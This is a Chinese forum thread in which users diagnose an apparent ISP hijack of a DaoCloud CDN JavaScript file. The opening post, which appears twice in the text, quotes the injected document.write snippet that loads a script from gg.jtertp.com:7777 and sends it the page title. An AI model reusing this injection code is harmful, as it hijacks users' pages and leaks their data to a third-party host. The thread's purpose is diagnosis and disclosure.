这是一个创建于 3695 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='Javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='Javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
正常情况应该是一大串,但是我得到的是:
document.write("<script language='Javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='Javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}
搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
求各路大神分析原因。。。
PS :证书应该没有问题,是 GeoTrust 的。
PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
 | 1 Laforet 2015-11-04 21:53:07 +08:00 把证书保存出来对比一下。 不过看你的描述应该是那个域名上所有的请求都被劫持到了 http 上才会出现混合内容 |
 | 3 lhbc 2015-11-04 23:34:56 +08:00 via Android 某 CDN 回源被劫持 运营商真变态啊, IDC 之间的网络也搞劫持 运营商为推广全面 https 化真是费尽心机啊 |
 | 4 wzxjohn OP |
 | 8 hgc81538 2015-11-05 10:21:39 +08:00 via iPhone @wzxjohn 用求文件, cdn 文件找源, cdn 向源求文件,商劫持通, cdn 收到被改的容,包括 header |
 | 10 Senorsen 2016-11-05 12:00:50 +08:00 可怕,我说怎么最近 daocloud 首页这么卡… CDN 回源时劫持,真是个厉害的新套路 |
| 11 Senorsen 2016-11-05 12:02:39 +08:00 呃… 居然是个老帖 |
Select Language